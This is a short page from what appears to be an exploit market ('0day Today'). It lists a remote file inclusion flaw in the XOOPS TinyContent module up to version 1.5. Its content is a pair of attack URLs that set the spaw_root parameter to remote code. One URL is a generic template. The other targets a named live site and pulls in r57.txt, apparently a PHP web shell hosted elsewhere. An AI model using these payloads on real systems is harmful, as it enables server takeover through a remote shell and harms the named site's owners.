[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XOOPS Module TinyContent 1.5 Remote File Inclusion Vulnerability

Author
Sp[L]o1T
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1944
Category
web applications
Date add
11-06-2007
Platform
unsorted
================================================================
XOOPS Module TinyContent 1.5 Remote File Inclusion Vulnerability
================================================================



~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module TinyContent Remote File Inclusion
version: < 1.5
source: http://prdownloads.sourceforge.net/xoops/xoops2-mod-tinycontent_1_5.zip
~~~~~~~~~~~~~~~~~~~~~~
BUG:
http://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?

Vuln site:
http://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#  0day.today [2024-12-23]  #